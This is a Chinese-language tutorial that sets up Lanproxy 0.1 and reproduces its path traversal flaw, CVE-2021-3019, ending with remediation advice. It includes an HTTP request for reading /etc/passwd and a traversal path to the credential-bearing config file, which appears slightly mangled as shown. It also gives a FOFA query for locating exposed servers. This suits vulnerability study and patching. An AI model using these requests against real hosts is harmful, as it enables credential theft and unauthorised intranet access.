Lanproxy路径遍历漏洞漏洞复现
字数 1461 2025-08-15 21:33:19
Lanproxy路径遍历漏洞(CVE-2021-3019)分析与复现指南
1. Lanproxy简介
Lanproxy是一个内网穿透工具,主要功能包括:
- 将局域网个人电脑、服务器代理到公网
- 支持TCP流量转发
- 可支持任何TCP上层协议
- 典型应用场景:
- 访问内网网站
- 本地支付接口调试
- SSH访问
- 远程桌面
1.1 同类产品对比
- 花生壳
- TeamView
- GoToMyCloud
Lanproxy的优势:
- 无需依赖第三方公网服务器
- 无服务限制
- 数据不流经第三方,安全性更高
2. 漏洞概述
漏洞编号:CVE-2021-3019
漏洞类型:路径遍历漏洞
影响版本:Lanproxy 0.1
漏洞危害:
- 可读取服务器上的任意文件
- 可获取lanproxy配置文件
- 通过配置文件可获取管理后台凭据
- 登录后台后可操纵内网主机
3. 环境搭建
3.1 服务端配置
下载方式:
- 项目地址:https://github.com/ffay/lanproxy
- 直接下载发布包:https://file.nioee.com/d/2e81550ebdbd416c933f/
配置步骤:
- 解压proxy-server-0.1.zip到公网VPS
- 编辑配置文件
proxy-server-0.1/conf/config.properties:
server.bind=0.0.0.0
server.port=4900
server.ssl.enable=true
server.ssl.bind=0.0.0.0
server.ssl.port=4993
server.ssl.jksPath=test.jks
server.ssl.keyStorePassword=123456
server.ssl.keyManagerPassword=123456
server.ssl.needsClientAuth=false
config.server.bind=0.0.0.0
config.server.port=8090
config.admin.username=admin
config.admin.password=657260
- 启动服务:
cd proxy-server-0.1/bin
chmod +x startup.sh
nohup ./startup.sh &
Windows系统:直接运行startup.bat
3.2 客户端配置
下载地址:https://seafile.cdjxt.net/d/2e81550ebdbd416c933f
配置步骤:
- 解压proxy-java-client-0.1.zip到内网主机
- 编辑配置文件
proxy-java-client-0.1/conf/config.properties:
client.key=8dfeb0db68c2400a8c0d30395abb65e2
ssl.enable=true
ssl.jksPath=test.jks
ssl.keyStorePassword=123456
server.host=47.xxx.xxx.72
server.port=4993
- 启动客户端:
cd proxy-java-client-0.1/bin
chmod +x startup.sh
nohup ./startup.sh &
Windows系统:直接双击startup.bat
3.3 端口映射配置
- 访问VPS的8090端口(如:http://47.xxx.xxx.72:8090)
- 使用配置的用户名密码登录(默认admin/657260)
- 在"添加客户端"选项中:
- 填写客户端名称
- 生成客户端秘钥
- 在"配置管理"中设置端口映射:
- 将内网主机端口(如22)映射到公网端口(如2222)
使用示例:
ssh root@47.xxx.xxx.72 -p 2222
4. 漏洞复现
4.1 漏洞验证
构造恶意请求读取/etc/passwd:
GET etc/passwd HTTP/1.1
Host: 47.xxx.xxx.72:8090
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9
Accept-Language: zh-CN,zh;q=0.9
Connection: close
4.2 读取配置文件
路径遍历读取配置文件:
/../conf/config.properties
获取到的配置文件包含:
- 管理后台用户名
- 管理后台密码
4.3 利用获取的凭据登录后台
使用读取到的用户名密码登录管理面板,获得内网访问权限。
5. 影响范围检测
FOFA搜索语法:
header="Server: LPS-0.1"
截至文档编写时,公网暴露的实例:2029台
6. 修复建议
-
临时解决方案:
- 禁止将lanproxy管理面板对外部开放
- 配置防火墙规则限制访问
-
长期解决方案:
- 升级到最新版本
- 补丁获取链接:https://github.com/ffay/lanproxy/commits/master
-
安全配置建议:
- 修改默认管理凭据
- 启用HTTPS
- 限制可访问IP
7. 参考资源
- Lanproxy配置指南:http://www.kekefund.com/2018/06/24/lanproxy/
- CNNVD漏洞公告:http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202101-275
- 漏洞分析文章:微信文章(标题:Lanproxy路径遍历漏洞分析)